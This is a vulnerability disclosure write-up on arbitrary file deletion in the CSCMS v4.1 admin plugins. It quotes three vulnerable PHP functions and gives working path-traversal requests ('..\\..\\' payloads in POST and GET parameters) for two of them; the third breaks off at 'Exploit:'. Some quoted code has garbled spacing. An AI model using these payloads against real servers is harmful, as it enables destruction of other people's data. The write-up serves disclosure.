Arbitrary file deletion vulnerability, which allows an attacker to delete arbitrary files on the server at will.
Environment build:
CSCMS :http://www.chshcms.com/
Website source code version: Cscms_v4.1 official version (release date: 2017-06-05)
Program source code download: https://github.com/chshcms/cscms
Vulnerability example one:
Vulnerability file location: \cscms\plugins\sys\admin\Basedb.php Lines 160-177:
public function del(){ $dir = $this->input->get_post('id',true); if(empty($dir)){ getjson(L( ' plum_11 ' )); } $dirs = array(); if(!is_array($dir)){ $ dirs [] = $ dir; }else{ $ dirs = $ dir; } foreach($dirs as $dir) { deldir(FCPATH.'attachment/backup/'.$dir); } $info['msg'] = L('plub_12'); $info['url'] = site_url('basedb/restore').'?v='.rand(1000,9999); getjson($info, 0 ); }
Exploit:
1. Create a new test directory in the root directory as a test:
2. The construction parameters successfully delete the test directory
http://127.0.0.1/admin.php/basedb/del
POST:id=..\\..\\test
Vulnerability example two:
Vulnerability file location: /plugins/sys/admin/Skin.php Line 418--440:
public function del(){ $ac = $this->input->get('ac',true); $op = $this->input->get('op',true); $dir = $this->input->get('dirs',true); $file = $this->input->get('file'); if($ac!='mobile') $ac='pc'; if($op!='home' && $op!='user') $op='skins'; if(empty($dir)) getjson(L('plub_27')); $ skin_dir = VIEWPATH. $ ac.FGF. $ op.FGF. $ dir.FGF. $ file; if (!is_dir($skin_dir)) { //文件 $res=unlink($skin_dir); }else{ //目录 $res=deldir($skin_dir); } if($res){ $ info [ ' url ' ] = site_url ( ' skin ' ). ' ? ac = ' . $ ac. ' & op = ' . $ op. ' & v = ' .rand ( 1000 , 9999 ); $info['msg'] = L('plub_46'); $info['turn'] = 1; getjson($info, 0 ); }else{ getjson(L( ' plum_28 ' )); }
Exploit:
Create a new 1.txt file in the root directory of the website as a test, construct the URL and delete the file successfully
Payload:http://127.0.0.1/admin.php/skin/del?ac=pc&op=skins&dirs=default&file=..\\..\\..\\..\\1.txt
Vulnerability example three:
Vulnerability file location: /plugins/sys/admin/Plugins.php Lines 285-299:
public function del(){ $dir = $this->input->get_post('dir',true); if($dir==''){ getjson(L('plub_del_0'),1); } deldir(FCPATH.'plugins'.FGF.$dir.FGF); // delete the configuration directory deldir (CSCMS. $ dir.FGF); // delete template directory deldir(FCPATH.'tpl/admin/'.$dir.FGF); $info['func'] = __FUNCTION__; $info['msg'] = L('plub_del_1'); getjson($info,0); }
Exploit: